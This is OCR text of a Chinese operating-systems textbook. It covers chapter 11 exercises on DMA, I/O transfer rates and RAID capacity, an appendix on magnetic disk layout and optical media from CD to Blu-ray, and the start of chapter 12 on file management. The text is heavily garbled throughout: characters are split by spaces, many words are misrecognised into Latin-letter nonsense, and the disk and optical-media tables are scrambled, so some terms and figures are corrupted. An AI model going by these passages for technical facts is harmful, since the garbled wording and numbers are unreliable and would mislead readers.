b) 在 系统 读 取 数据 的 过 程 中 ,操作 系统 可 以 用 于 处 理 其 他 进程 的 时 间 是 多 少 ? 相对 于 读 到 磁盘 的 总 

传输 时 间 ， 所 占 的 百分比 是 多 少 ? 
再 次 考虑 习题 11.7 和 11.8 中 的 磁盘 系统 。 假 设 磁盘 控制 器 和 系统 内 存 之 间 的 数据 传输 采用 DMA 方 
R, 总线 速度 为 2MB/ 秒 。 在 该 条 件 下 ， 系 统 读 入 整个 扇 区 需要 花费 多 少时 间 ? 在 这 段 时 间 内 PRE 
系统 可 以 用 于 处 理 其 他 进程 的 时 间 是 多 少 ? 
一 个 32 位 计算 机 有 两 个 选择 通道 和 一 个 多 路 通道 ， 每 个 选择 通道 支持 两 个 磁盘 和 两 个 磁带 部 件 。 
多 路 通道 有 两 个 行 式 打印 机 、 两 个 卡片 阅读 机 ， 并 连接 着 10 个 VDT 终端 。 假 设 有 以 下 的 传送 率 . 
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磁盘 驱动 器 800KB/s 

磁带 驱动 器 200KB/s 

行 式 打印 机 6.6KB/s 

卡片 阅读 机 1.2KB/s 

VDT 1KB/s 
估计 系统 中 最 大 总 的 VO 传送 率 为 多 少 ? 

11.11 当 条 带 的 大 小 比 VO 请 求 的 大 小 小 时 ， 磁 盘 条 带 化 显然 可 以 提高 数据 传送 率 。 同 样 ， 相 对 于 单个 的 
大 磁盘 ， 由 于 RAID 0 可 以 并 行 处 理 多 个 IO 请 求 ， 显 然 它 可 以 提高 性 能 。 但 是 ， 对 于 后 一 种 情况 ， 
磁盘 条 带 化 还 有 必要 存在 吗 ? 也 就 是 说 ， 相 对 于 没有 条 带 化 的 磁盘 阵列 ， 磁 盘 条 带 化 可 以 提高 UO 
请 求 速率 的 性 能 吗 ? 

11.12 现 有 一 个 RAID 磁盘 阵列 ， 包 含 四 个 磁盘 ， 每 个 磁盘 大 小 都 是 200GB RAE RAID 级 分 别 为 
0,1,2,3,4,5,6 时 ， 该 磁盘 阵列 的 有 效 存储 容量 是 多 少 ? 


附录 11A ”磁盘 存储 设备 


磁盘 


磁盘 是 由 表面 涂 有 磁性 物质 的 金属 或 塑料 构成 的 圆 形 盘 片 。 数 据 被 记录 在 磁盘 中 ， 然 后 可 以 通过 一 个 
称 做 磁头 的 导体 线圈 从 磁盘 中 取出 。 在 进行 读 操作 或 写 操作 期 间 ， 磁 头 是 固定 的 ， 磁 盘 在 它 下 面 旋转 。 

写 机 制 基于 通过 线圈 的 电流 会 产生 磁场 的 原理 。 电 磁 脉 冲 被 送 到 磁头 ， 产 生 的 磁 模 式 被 记录 在 磁头 下 
面 的 磁盘 面 中 ， 正 负电 流 会 产生 不 同 的 磁 模 式 。 读 机 制 基于 这 一 事实 : 相对 于 线圈 移动 的 磁场 会 在 线圈 中 
产生 电流 。 当 盘 片 在 磁头 下 面 经 过 时 ， 可 以 产生 与 以 前 记录 的 极 性 相同 的 电流 。 


数据 组 织 和 格式 化 

磁头 是 一 个 相对 比较 小 的 设备 ， 它 能 够 从 旋转 到 其 下 面 的 盘 片 部 分 中 读 取 或 写 人 数据 。 这 就 导致 盘 片 
上 的 数据 被 组 织 在 一 组 同心 圆 中 ， 称 为 磁道 。 每 个 磁道 与 磁头 一 样 宽 ， 每 个 盘面 有 上 干 个 磁道 。 

图 11.16 描绘 了 磁盘 数据 的 布局 。 相 邻 的 磁道 通过 间隙 被 分 隔 开 ， 这 样 可 以 避免 或 者 至 少 减 小 由 于 磁 
头 未 对 准 或 磁场 之 间 的 于 扰 引 发 的 错误 。 

数据 按 扇 区 ( 见 图 11.16 ) 从 磁盘 中 向 外 或 向 磁盘 里 传送 。 通 常 每 个 磁道 有 几 百 个 扇 区 ,它们 可 以 是 固 
定 长 度 的 ， 也 可 以 是 可 变 长 度 的 。 对 于 大 多 数 磁盘 驱动 器 ， 扇 区 大 小 固定 为 512 个 字 节 。 为 避免 对 系统 强 
加 不 合理 的 精度 要 求 ， 相 邻 的 扇 区 通过 磁道 内 部 ( 扇 区 间 ) 的 间隙 来 分 隔 。 

靠近 旋转 的 磁盘 中 心 的 一 个 数据 位 ， 通 过 一 个 固定 点 ( 如 读 写 磁头 ) 时 候 的 速度 要 慢 于 磁盘 外 侧 的 一 
个 数据 位 。 因 此 必须 找到 某 种 办 法 来 补偿 这 种 速度 上 的 差别 ,使 得 磁头 可 以 以 相同 的 速度 读 取 每 个 比特 。 
这 个 间 题 可 以 通过 增加 记录 在 磁盘 上 信息 的 比特 位 之 间 的 间隙 来 解决 。 这 样 信息 就 可 以 通过 定 速 旋转 的 磁 
盘 ， 以 相同 的 速度 扫描 ， 这 称 为 恒定 角速度 ( Constant Angular Velocity,CAV )。 图 11.17a 显示 了 使 用 CAV 
技术 的 磁盘 布局 。 磁盘 被 划分 成 饼 状 的 扁 区 以 及 一 系列 同心 的 磁道 。 使 用 CAV 的 好 处 是 每 块 数据 可 以 由 磁 
道 和 扇 区 直接 定位 。 为 了 将 磁头 从 当前 的 位 置 移动 到 指定 的 位 置 ， 只 需 将 磁头 短 距 离 移动 到 指定 的 磁道 ， 
然后 等 待 合适 的 扇 区 旋转 到 磁头 下 面 。CAV 的 不 足 是 ， 磁 盘 外 圈 的 磁道 尽管 较 长 ， 但 是 其 保存 的 数据 量 跟 
较 短 的 内 圈 磁 道 相 同 。 

由 于 存储 密度 单位 面积 的 比特 数 从 最 外 边 的 磁道 向 最 里 面 的 磁道 递增 ， 因 此 采用 一 般 CAV 系统 的 磁 
盘 ， 其 存储 容量 受 限 于 最 内 磁道 的 最 大 记录 密度 。 为 了 增加 密度 ， 现 代 磁 盘 系 统 使 用 了 一 种 称 为 多 区 记录 
( Multiple zone recording) 的 技术 ,该 技术 中 磁盘 表面 被 划分 为 多 个 同心 的 区 域 (上 典型 为 16 个 )。 在 一 个 区 
域内 ， 每 个 磁道 的 比特 数 是 个 常数 。 那 些 远 离 中 心 的 区 域 比 那些 靠近 中 心 的 区 域 含 有 更 多 的 比特 。 这 使 得 
可 以 闭 得 更 大 的 存储 空间 ， 其 代价 是 更 复杂 的 旋转 控制 。 当 磁盘 头 从 一 个 区 域 移动 到 另 一 个 区 域 的 时 候 ， 
每 个 比特 的 长 度 也 随 着 磁道 的 变化 而 变化 ， 这 就 引起 了 读 写 时 间 的 变化 。 图 11.17b 表示 了 多 区 记录 的 分 布 
Wa, 其中， 每 个 区 域 是 一 个 磁道 宽 。 

需要 一 些 方法 在 一 个 磁道 中 定位 扇 区 的 位 置 。 很 显然 ， 磁 道上 必须 有 个 开始 点 以 及 一 个 判 斯 每 个 肩 区 
开始 和 结束 的 方法 。 这 些 需 求 可 以 由 磁盘 上 记录 的 控制 数据 来 处 理 。 因 而 ， 磁 盘 格 式 化 后 会 包含 一 些 额外 
数据 ， 这 些 数 据 只 能 被 磁盘 驱动 器 使 用 ， 用 户 是 不 能 访问 的 。 
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b) 恒定 线 速度 
图 11.16 磁盘 数据 布局 图 11.17 BBA 


物理 特性 

表 11.6 列 出 不 同类 型 的 磁盘 之 间 的 主要 差别 。 首 先 ， 磁头 相对 于 盘 片 的 径 向 方向 可 以 是 固定 的 ， 也 可 
以 是 可 移动 的 。 对 于 固定 头 磁盘 ( fixed-head disk )， 每 个 磁道 都 有 一 个 读 / 写 磁头 。 所 有 磁头 都 安装 在 一 个 
刚性 的 磁头 营 中 ， 磁头 璧 可 以 伸展 ， 跨 过 所 有 的 磁道 。 而 活动 头 磁盘 ( movable-head disk) 只 有 一 个 读 / 写 
磁头 ,同样 ， 这 个 磁头 也 安装 在 一 个 磁头 辟 中 。 由 于 磁头 必须 能 够 定位 在 任何 一 个 磁道 上 ， 磁头 辟 可 以 为 
这 个 目的 伸展 或 缩 回 。 


R116 磁盘 系统 的 物理 特性 


磁头 移动 ry 

固定 头 〈 每 个 磁道 一 个 ) 单个 盘 片 

活动 头 (每 个 盘面 一 个 ) ZIRH 
磁盘 可 移动 性 磁头 机 制 

HERR 接触 《软盘 ) 

可 换 式 磁盘 (ls (BR 

空气 动力 间隙 ( Winchester ) 

面 

单 面 

双 面 


磁盘 本 身 安 装 在 一 个 磁盘 驱动 器 中 ， 磁 盘 驱动 器 由 磁头 臂 、 用 于 旋转 磁盘 的 轴 心 和 二 进 制 数 据 输 人 输 
出 所 需要 的 电子 设备 组 成 。 固 定 磁 盘 (nonremovable disk) 永久 地 安装 在 磁 益 驱动 器 上 ,个 人 计算 机 中 的 
硬盘 就 是 一 个 国定 磁盘 。 可 换 式 磁盘 《removable disk) 可 以 被 移 走 并 用 另 一 个 磁盘 替换 。 可 换 式 磁 本 的 优 
点 是 可 以 通过 有 限 数量 的 磁盘 系统 得 到 无 限 的 数据 量 。 此 外 , 这 类 磁盘 可 以 从 一 个 计算 机 系统 移 到 另 一 个 。 
软盘 和 ZIP 磁盘 就 是 可 换 式 磁盘 的 例子 。 

WEKSRRS, AHORRA KRE, RRR (double sided )。 某 些 比较 便宜 的 磁盘 系统 使 用 
SW (single-sided) BA. 

某 些 磁盘 驱动 器 允许 多 个 盘 片 (multiple platter) EHHBRK, RCMB 1 英寸 ， 同 时 提供 多 个 
磁头 辟 。 这 些 盘 片 称 做 磁盘 组 (disk pack )， 如 图 11.18 所 示 。 多 盘 片 磁盘 采用 活动 头 ， 每 个 盘面 一 个 读 / 
写 磁 头 。 所 有 的 磁头 被 机 械 地 固定 在 一 起 ， 使 得 它们 距 磁 盘 中 心 的 距离 相同 ， 并 且 可 以 一 起 移动 。 因 此 ， 
在 任何 时 候 ， 所 有 的 磁头 都 位 于 与 磁盘 中 心 距 离 相同 的 磁道 上 。 所 有 盘 片上 相对 位 置 相 同 的 磁道 的 组 合 称 
GE (cylinder), PI, Æ 11.19 中 所 有 用 阴影 表示 的 磁道 就 是 一 个 柱 面 的 一 部 分 。 

最 后 ， 根 据 磁 头 机 制 可 以 把 磁盘 划分 成 三 类 。 传 统 上 ， 读 / 写 磁 头 位 于 盘 片 上 方 一 个 固定 距离 处 ， 人 允许 
有 一 空气 间隙 。 另 一 种 极端 是 在 读 写 操作 期 间 ， 磁 头 机 制 在 物理 上 接触 到 了 介质 。 这 种 机 制 常 用 于 软盘 。 
软盘 是 一 种 比较 小 、 比 较 灵 活 并 且 很 便 宣 的 磁盘 类 型 。 

为 理解 第 三 种 类 型 的 磁盘 ， 有 必要 解释 一 下 数据 密度 与 空气 间隙 的 大 小 之 间 的 关系 。 为 了 正确 地 读 或 
写 ， 人 磁头 必须 能 够 产生 或 感知 到 足够 的 电磁 场 。 磁 头 越 罕 ， 它 在 工作 时 就 必须 离 盘 片 越 近 。 磁头 比较 奉 意 
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BLK. Winchester 磁盘 的 研制 进一步 推动 了 这 项 技术 的 发 展 。Winchester 磁头 用 在 密封 的 、 几 乎 没有 杂质 
的 驱动 器 部 件 中 。 它 们 被 设计 成 在 操作 时 比 传统 的 刚性 磁头 更 接近 盘面 ， 因 而 允许 更 大 的 数据 密度 。 磁 头 实 
际 上 是 一 个 空气 动力 薄膜 ， 当 磁盘 不 动 时 经 轻 地 停 在 盘面 上 ， 磁盘 旋转 时 产生 的 气压 足以 使 这 个 薄膜 升 高 离 
开盘 面 。 由 此 得 到 的 非 触 式 系统 可 以 使 用 更 罕 的 磁头 ， 可 以 比 传统 的 刚性 磁头 轼 离 盘面 更 近 进行 操作 9 。 


读 / 写 磁头 (每 个 盘面 一 个 ) 磁头 臂 运 
动 的 方向 _ 
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轴 心 
图 11.18 磁盘 驱动 器 的 组 成 图 11.19 ”磁道 和 柱 面 
表 11.7 给 出 了 当代 典型 的 高 性 能 磁盘 的 磁盘 参数 。 


表 11.7 典型 的 磁盘 驱动 如 参数 


Seagate ‘ z 
Seagate Cheetah Seagate Toshiba | _ Hitachi 
e 
Barracuda 180 Barracuda 36ES HDD1242 Microdrive 
X15-36LP 


2 


应 用 高 性 能 服务 器 | 手持 设备 
aa a a n ‘a 

aa Tas 
ET st 
Zee ie ER Pr 
最 大 传送 率 522~709 MB/s 66 MB/s 7.2MB/s 
sears | oa [aa rane 
RE HH a 

”每 柱 面 的 磁道 aer 


EH (tr 


© 从 历史 的 角度 看 ， 术 语 Winchester 最 早出 自 IBM 3340 磁 牧 模型 发 布 前 的 编号 。 3340 ae HA 
磁盘 ,磁头 密封 其 中 。 该 术语 目前 指 的 是 任何 具有 空气 动力 磁头 设计 的 封装 磁盘 。 Winchester 磁盘 通常 用 于 构 
造 个 人 电脑 和 工作 站 ， 也 称 为 硬盘 。 


] 
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光 存 储 器 

1983 年 引进 的 光盘 ( CD ) 数字 声音 系统 是 史上 最 成 功 的 消费 产品 之 一 。CD 是 一 种 不 可 擦 写 的 磁盘 ， 
一 面 可 以 存储 超过 60 分 钟 的 声音 信息 。CD 在 商业 上 的 巨大 成 功 推动 了 价格 便宜 的 光盘 存储 技术 的 开发 ， 
从 而 给 计算 机 数据 存储 带 来 了 重大 的 革命 。 当 前 ,已 经 出 现 了 各 种 各 样 的 光盘 系统 ( 见 表 11.8 ), 下 面 简单 
介绍 几 种 。 . 






































#18 光盘 产品 
类 型 说 BA 
cp | 压缩 光盘 。 一 种 存储 数字 音频 信息 的 不 可 擦 除 盘 片 ， 标 准 系 统 使 用 12cm 的 
盘 片 ， 可 以 记录 超过 60 分 钟 的 不 间断 录音 
CD-ROM 只 读 存 储 压缩 光盘 ,一 种 用 来 存储 计算 机 数据 的 不 可 擦 除 盘 片 , 标准 系统 使 
用 12cm 的 盘 片 ， 可 以 存储 超过 650MB 的 数据 
CD-R 可 记录 CD， 与 CD-ROM 相似 ， 用 户 能 县 仅 能 往 盘 上 写 一 次 
CD-RW 可 重 写 CD， 与 CD-ROM 相似 ， 用 户 可 以 擦 除 和 重 写 多 次 
数字 化 视频 光盘 ,产生 数字 化 、 压 缩 视频 信息 的 一 种 技术 , 同时 也 可 用 于 其 
DVD 他 大 容量 数字 式 数据 ， 其 直径 可 以 为 8cm 和 12cm， 双 面容 量 高 达 17GB。 基 
本 的 DVD 是 只 读 的 (DVD-ROM ) 
DVDR | wie DVD, 5DVD-ROMAM, APRARGERT LEK. Ae 
面 可 用 
| WY DvD. 5DVDROMAD, HP TURNER SK. AA 
DVD-RW 
面 可 用 
HD-DVD 高 清 DVD， 提 供 比 普通 DVD 更 大 的 数据 存储 容量 ,使 用 405 nm (ER 
blue violet) BOG. BABE A A 15GB 
蓝光 -DVD XWF HD-DVD。 单 面 单 层 可 存储 25GB 
CD-ROM 


音频 CD 和 CD-ROM (光盘 只 读 存 储 器 ，Compact Disc Read-Only Memory) 使 用 的 是 同一 种 技术 。 主 
要 差别 是 CD-ROM 具有 纠 错 设备 ,确保 数据 可 以 正确 地 从 光盘 传送 到 计算 机 。 这 两 种 类 型 的 光盘 是 用 同样 
的 方法 制作 的 。 光 盘 是 用 一 种 树脂 制 成 的 ， 如 育 碳 酸 酯 。 记 录 的 数字 化 信息 ( 音乐 数据 或 计算 机 数据 ) 用 
一 系列 细微 的 四 坑 压 在 反射 表面 上 。 要 做 到 这 一 点 ， 首 先 需 要 用 聚焦 精细 的 高 强度 激光 创建 一 个 母 盘 ， 然 
后 再 以 母 盘 为 模板 制作 出 副本 。 副 本 有 冲 坑 的 表面 被 涂 了 一 层 高 反射 的 表层 ， 通 常 是 铝 膜 或 金 膜 。 这 个 网 
亮 的 表面 覆盖 了 一 层 透 明 丙烯 酸 酯 以 防止 灰尘 和 划 伤 。 最 后 ， 在 丙烯 酸 酯 上 打印 上 标签 。 

从 CD 或 CD-ROM 中 检索 信息 是 通过 一 个 封装 在 光盘 播放 器 或 驱动 装置 中 的 小 功率 激光 完成 的 。 当 电 
机 旋转 磁盘 经 过 激光 束 时 ,激光 束 射 向 透明 的 保护 镜 层 。 当 激光 束 遇 到 一 个 凹 坑 时 ,反射 光 的 强度 会 改变 。 
这 个 变化 被 一 个 光学 传感器 检测 到 ， 并 转换 成 数字 信和 号 。 

回忆 前 面 所 描述 的 磁盘 ,磁盘 上 的 数据 记录 在 同心 的 磁道 上 。 在 最 简单 的 恒定 角速度 ( CAV ) 系统 中 ， 
每 个 磁道 所 存储 的 比特 位 数 是 个 常数 。 通 过 多 区 存储 记录 方式 可 以 增 大 密度 ， 在 此 方式 下 磁盘 表面 被 划分 
成 很 多 区 域 ， 远 离 磁 盘 中 心 的 区 域 包含 有 比 靠 近 中 心 区 域 更 多 的 比特 位 。 尽 管 这 种 技术 增加 了 磁盘 容量 ， 
但 仍然 不 是 最 佳 的 。 

为 了 获得 更 大 的 磁盘 容量 ，CD 和 CD-ROM 并 没有 将 所 保存 信息 组 织 在 同心 圆 的 轨道 上 。 相 反 ， 光 盘 
上 包含 一 个 螺旋 的 轨道 ， 该 轨道 开始 于 靠近 光盘 中 心 的 位 置 ， 终 止 于 光盘 的 外 沿 。 光 盘 外 党 的 扇 区 与 内 部 
的 扇 区 长 度 相 等 。 这 样 ， 信 息 将 被 均匀 地 封装 在 光盘 上 相同 大 小 的 段 上 , 而 其 又 在 光盘 转速 变化 的 情况 下 ， 
以 相同 的 速率 被 扫描 。 因 而 四 坑 所 包含 的 数据 被 激光 以 恒定 线 速 度 〈( CLV ) 读 取 。 光 盘 在 访问 外 沿 数据 时 
的 转速 要 人 慢 于 访问 内 圈 数 据 时 的 转速 。 因 而 ， 在 靠近 光盘 外 沿 的 位 置 ， 光 盘 软 道 的 容量 和 旋转 延迟 都 会 增 
加 。 一 张 CD-ROM 的 容量 大 约 为 680MB。 

CD-ROM 适用 于 将 大 量 数 据 分 发 给 很 多 用 户 的 情况 。 但 考虑 到 在 最 初 写 数 据 时 的 开销 ， 其 并 不 适用 于 
个 别 应 用 程序 。 与 传统 的 磁盘 相 比 较 ，CD-ROM 有 以 下 三 个 主要 优势 : 

© 光盘 的 信息 存储 能 力 较 大 。 
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多 光盘 及 其 上 面 的 数据 可 以 被 廉价 地 大 规模 复制 ， 而 磁盘 做 不 到 这 点 。 磁 盘 上 的 数据 库 只 有 在 使 用 
两 个 磁盘 驱动 器 的 情况 下 才能 被 复制 到 另 一 个 磁盘 。 

© 光盘 是 可 以 移动 的 ， 其 允许 光盘 本 身 被 用 来 归档 存储 。 大 多 数 磁盘 是 不 可 移动 的 。 在 磁盘 驱动 器 
或 磁盘 保存 新 信息 前 ， 固 定 磁 盘 上 存储 的 信息 必须 首先 拷贝 到 一 些 其 他 的 存储 设备 上 。 

CD-ROM 的 不 足 如 下 : 

@ 其 是 只 读 的 且 不 能 更 新 。 

@ 访问 时 间 远 长 于 磁盘 驱动 器 ， 最 长 可 达 半 秒 钟 。 


可 记录 CD 

为 了 满足 对 一 个 数据 集 只 需 一 份 或 少量 拷贝 这 种 情况 的 需要 ,开发 了 称 为 可 记录 CD (CD-R) 的 光盘 ， 
它 可 以 写 一 次 ， 读 多 次 。 对 于 CDR 来 说 ， 光 盘 的 制作 过 程 如 下 ， 其 中 的 数据 可 以 通过 一 个 适当 强度 的 激 
光束 写 人 。 这 样 ， 通 过 一 个 比 CD-ROM 造价 稍 高 些 的 光盘 控制 器 ， 用 户 可 以 写 一 次 光盘 ， 并 读 取 多 次 。 

CD-R 使 用 的 介质 类 似 于 CD R CD-ROM, 但 并 不 完全 相同 。 对 CD 和 CD-ROM 来 说 ， 信 息 是 通过 介 
质 表 面 的 目 坑 ， 以 改变 反射 率 来 记录 的 。 而 对 CDR 来 说 ,介质 包括 一 个 染色 层 。 该 染色 层 被 用 来 改变 折 
射 率 并 且 可 以 被 高 强度 激光 所 激活 。 这 样 产生 的 光盘 可 以 在 CD-R 或 CD-ROM 驱动 器 上 读 取 。 

CD-R 在 存储 文档 和 文件 上 很 有 吸引 力 。 其 提供 了 一 种 永久 记录 大 量 用 户 数据 的 方式 。 


可 刻录 CD 

CD-RW 光盘 可 以 反复 地 写 和 覆盖 写 , 如 同 磁盘 一 样 。 尽 管 尝试 了 很 多 方法 , 唯一 被 证 明 有 吸引 力 的 纯 
光学 方法 称 为 相位 改变 。 相 位 政变 的 光盘 所 使 用 的 介质 ， 在 两 种 不 同 的 相位 阶段 会 有 两 种 显著 不 同 的 折射 
率 。 存在 一 个 无 组 织 的 状态 ,在 该 状态 下 ,分 子 展 示 出 一 种 随机 的 方向 性 ， 反射 光线 能 力 不 好 ; 还 存在 一 
个 水 晶 状 态 ， 在 该 状态 下 有 光滑 的 表面 ， 并 且 反 射 光线 能 力 强 。 激 光束 可 以 将 介质 从 一 个 状态 转换 到 另 一 - 
个 状态 。 这 种 光盘 上 介质 的 状态 改变 最 主要 的 缺陷 是 ， 介 质 最 终 会 永久 失去 其 所 具有 的 这 种 特性 。 目 前 用 
于 这 种 光盘 的 介质 可 以 擦 除 500000 到 1000000 次 。 

CD-RW 对 于 CD-ROM 或 CD-R 来 说 具有 明显 的 优势 ， 其 可 以 重 写 ， 因 而 可 以 用 做 真正 的 辅助 存储 器 。 
正 因为 如 此 ， 它 可 以 和 磁盘 竞争 。 光 盘 的 相对 于 磁盘 的 一 个 主要 优势 在 于 ， 机 械 容忍 度 对 光盘 要 求 的 严格 
程度 远 远 低 于 对 高 容量 磁盘 的 要 求 。 光 盘 的 一 个 关键 优点 是 光盘 的 工程 公差 远 不 如 高 容量 磁盘 那么 严格 。 
因此 ， 光 盘 展 现 出 更 高 的 可 靠 性 和 更 长 的 寿命 。 


数字 化 视频 光盘 
由 于 大 容量 的 数字 化 视频 光盘 (DVD) 的 出 现 ， 电 子 行业 最 终 找到 了 可 以 替代 模拟 信和 号 的 家 庭 录像 带 
的 设备 。DVD 将 替代 盒 式 录像 机 (VCR) 中 的 录像 带 ， 甚 至 可 以 替代 个 人 计算 机 和 服务 器 中 的 CD-ROM, 
DVD 把 视频 带 人 数字 时 代 。 它 可 以 传送 电影 ， 保 证 极 佳 的 图 像 质 量 ， 并 且 可 以 像 音频 CD 一 样 自由 访问 ， 
DVD 机 器 也 能 够 放 CD。 大 量 的 数据 被 塞 人 DVD 盘 中 ， 当 前 它 的 容量 是 CD-ROM 的 7 倍 。 通 过 DVD E 
大 的 存储 能 力 和 逼真 的 品质 ，PC 游戏 将 更 加 真实 ， 教 育 软件 也 可 以 采用 更 多 的 视频 。 当 这 种 材料 结合 到 
Web 站 点 中 ， 势 必 会 对 Internet 和 企业 内 部 网 的 发 展 带 来 新 的 高 峰 。 
DVD 具有 更 大 的 容量 是 由 于 其 不 同 于 CD 的 三 个 方面 : 
1) DVD 上 的 比特 位 更 加 紧凑 。CD 上 螺旋 圈 之 间 的 距离 为 1.6hm， 比 特 位 之 间 的 距离 为 0.834pum。 
DVD 使 用 了 更 短波 长 的 激光 , 因此 其 螺旋 圈 之 间 的 距离 为 0.74hm, 而 比特 位 之 间 的 距离 为 0.4hm。 
这 两 方面 的 提高 使 得 DVD 的 容量 可 以 达到 4.7GB。 
2) DVD 可 以 在 第 一 层 上 再 刻录 第 二 层 数据 。 一 个 双 层 DVD 在 反射 层 之 上 还 有 个 半 反 射 层 , 通过 调整 
焦距 ， 就 可 以 分 别 读 取 两 层 数据 。 这 种 技术 几乎 加 倍 了 DVD 的 容量 ,使 其 达到 了 8.5GB。 由 于 第 
二 层 较 低 的 反射 率 ， 使 其 不 能 完全 达到 翻 倍 所 应 该 具有 的 存储 能 力 。 
3) DVD 可 以 记录 在 光盘 的 两 面 ， 而 不 像 CD 其 只 能 记录 在 光盘 的 一 面 ， 这样 一 张 DVD 最 多 可 以 容纳 
17GB 的 数据 。 
F CD 一样 ，DVD 也 具有 只 读 类 型 和 可 写 类 型 ( 如 表 11.8 所 示 )。 


高 清晰 度 光盘 
高 清晰 度 光盘 被 设计 用 来 存储 高 清晰 度 视频 ， 并 提供 比 DVD 更 大 的 存储 容量 。 通 过 使 用 在 蓝 兹 光 范 
围 内 更 短 的 激光 波长 ， 实 现 了 更 高 的 位 密度 。 高 清晰 度 光盘 中 构成 数字 1 和 0 的 数据 坑 与 DVD 相 比 更 小 ， 
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这 是 由 于 其 激光 波长 更 短 。 

有 两 种 相互 竞争 的 磁盘 格式 和 技术 已 经 被 市 场所 接受 ( 见 图 11.20 )。 高 清 DVD 格式 在 单 层 单 面 就 有 15 GB 
的 存储 空间 。 对 多 层 和 双 面 的 使 用 最 终 会 导致 更 大 的 存储 能 力 .。 有 三 个 可 用 的 类 型 ， RREK HD DVD - ROM ), 
可 录制 一 次 型 (HD DVD-R) 以 及 可 重复 录制 型 (HD DVD-RAM), 

蓝光 光盘 面 上 的 数据 层 位 置 更 接近 激光 头 〈 显示 在 图 11.20 中 每 个 图 的 右边 )。 这 导致 了 更 密集 的 聚焦 
和 失真 减少 ， 从 而 获得 了 更 小 的 数据 坑 和 轨道 。 蓝 光 光 盘 的 单 层 上 可 以 储存 25 GB。 蓝 光 光 盘 有 三 种 类 型 ; 
只 读 型 (BD-ROM )、 可 录制 一 次 型 ( BD-R ) 以 及 可 重复 录制 型 (BD-RE )。 


0.62 um 
HD DVD 


2.11 um 








650 nt 
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第 12 章 文件 管理 


在 大 多 数 应 用 中 , 文件 是 核心 部 分 。 除 了 实时 应 用 和 一 些 特殊 的 应 用 外 , 应 用 程序 的 输入 都 
是 通过 文件 来 实现 的 。 实际 上 所 有 的 应 用 程序 的 输出 都 保存 在 文件 中 , 这 便于 信息 的 长 期 存储 以 
及 用 户 或 应 用 程序 将 来 访问 信息 。 

除了 把 文件 用 作 输 入 或 输出 的 单个 应 用 程序 外 , 用 户 还 希望 可 以 访问 文件 、 保存 文件 并 保持 
文件 内 容 的 完整 性 。 为 实现 这 些 目标 , 实际 上 所 有 的 操作 系统 都 提供 了 文件 管理 系统 。 在 典型 情 
GP, 一 个 文件 管理 系统 由 系统 实用 程序 组 成 ,它们 可 以 作为 具有 特权 的 应 用 程序 来 运行 。 一 般 
来 说 , 整个 文件 管理 系统 都 被 当做 是 操作 系统 的 一 部 分 。 因此, 在 本 书 中 讲述 关于 文件 管理 的 一 
些 基 本 原理 是 很 有 必要 的 。 

本 章 首先 给 出 一 个 概述 , 接 下 来 介绍 各 种 不 同 的 文件 组 织 方案 。 尽管 文件 的 组 织 通常 超出 了 
操作 系统 的 范围 , 但 它 能 帮助 读者 理解 在 涉及 文件 管理 的 一 些 设计 折衷 时 所 做 的 选择 。 本 章 的 其 
余部 分 讲述 有 关 文 件 管理 的 其 他 主题 。 


12.1 概述 


12.1.1 文件 和 文件 系统 


从 用 户 的 角度 来 看 ， 文 件 系统 是 操作 系统 的 一 个 重要 部 分 。 文 件 系 统 提供 了 与 二 级 存储 相 
关 的 资源 的 抽象 。 文 件 系统 允许 用 户 建立 有 所 需要 特性 的 被 称 为 文件 的 数据 集合 ， 例 如 : 
o 长 期 存在 : 文件 存储 在 硬盘 上 或 其 他 二 级 存储 器 上 。 当 用 户 注 销 时 ， 文 件 不 会 丢失 。 
@ 进程 间 可 共享 : 文件 有 名 字 ， 具 有 相关 的 可 控制 的 共享 访问 权限 。 
o 结构 : 通过 文件 系统 ， 一 个 文件 有 对 应 于 特定 应 用 的 内 部 结构 。 此 外 ,文件 可 以 被 组 织 
成 层次 结构 或 者 更 复杂 的 结构 去 反映 文件 之 间 的 关系 。 
任何 文件 系统 不 但 提供 一 个 手段 去 存储 数据 ( 被 组 织 为 文件 )， 而 且 提 供 一 系列 对 文件 进行 
操纵 的 功能 接口 。 典 型 的 操作 如 下 : 
o 创建 : 定义 一 个 新 的 文件 ， 同 时 分 配 一 个 文件 结构 。 
o 删除 : 删除 文件 结构 ， 释 放 相关 资源 。 
@ 打开 : 一 个 已 存在 的 文件 由 进程 通过 “打开 ”操作 去 打开 ， 并 允许 进程 对 该 文件 进行 操作 。 
@ 关闭 : 相关 进程 关闭 该 文件 。 这 样 该 进程 就 不 再 能 对 该 文件 进行 操作 ， 直 到 进程 再 次 打 
开 它 。 
o ik: 进程 读 文件 的 所 有 或 部 分 数据 。 
@ 5: 进程 更 新 文件 ， 添 加 数据 或 者 改变 文件 中 已 存在 的 数据 。 
一 般 地 , 文件 系统 为 文件 维护 了 一 系列 的 属性 。 这 些 属 性 包括 所 有 者 、 创 建 时 间 、 最 后 修改 
时 间 和 访问 权限 等 。 


12.1.2 文件 结构 


在 讨论 文件 时 通常 使 用 域 、 记 录 、 文 件 、 数 据 库 4 个 术语 。 
域 (field) 是 基本 数据 单元 。 一 个 域 包含 一 个 值 ， 如 雇员 的 名 字 、 日 期 或 传感器 读 取 的 值 。 
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域 可 以 通过 它 的 长 度 和 数据 类 型 (如 ASCH 字符 串 、 二 进 制 数 等 ) 来 描述 。 域 的 长 度 可 以 是 固 
定 的 ， 也 可 以 是 可 变 的 ， 这 取决 于 文件 的 设计 。 对 于 后 一 种 情况 ， 域 通常 包含 两 个 或 三 个 子 域 : 
要 保存 的 实际 值 、 域 名 , 在 某 些 情况 下 还 包括 域 的 长 度 。 在 其 他 情况 下 , 域 之 间 特 殊 的 划分 符号 
暗示 了 域 的 长 度 。 
i (record) 是 一 组 相关 的 域 的 集合 ， 它 可 以 看 做 是 应 用 程序 的 一 个 单元 。 例 如 ， 一 个 雇 
员 记 录 可 能 包含 以 下 域 : 名 字 、 社 会 保障 号 、 工 作 类 型 、 雇 用 日 期 等 。 同 样 ， 记 录 也 可 以 是 固定 
长 度 的 或 可 变 长 度 的 , 这 取决 于 设计 。 如 果 一 个 记录 中 的 某 些 域 是 可 变 长 度 的 , 或 者 记录 中 域 的 
数目 可 变 , 则 该 记录 是 可 变 长 度 的。 对 于 后 一 种 情况 , 每 个 域 通常 都 有 一 个 域名 。 对 这 两 种 情况 ， 
整个 记录 通常 都 包括 一 个 长 度 域 。 
文件 〈file ) 是 一 组 相似 记录 的 集合 ， 它 被 用 户 和 应 用 程序 看 做 一 个 实体 ， 并 可 以 通过 名 字 
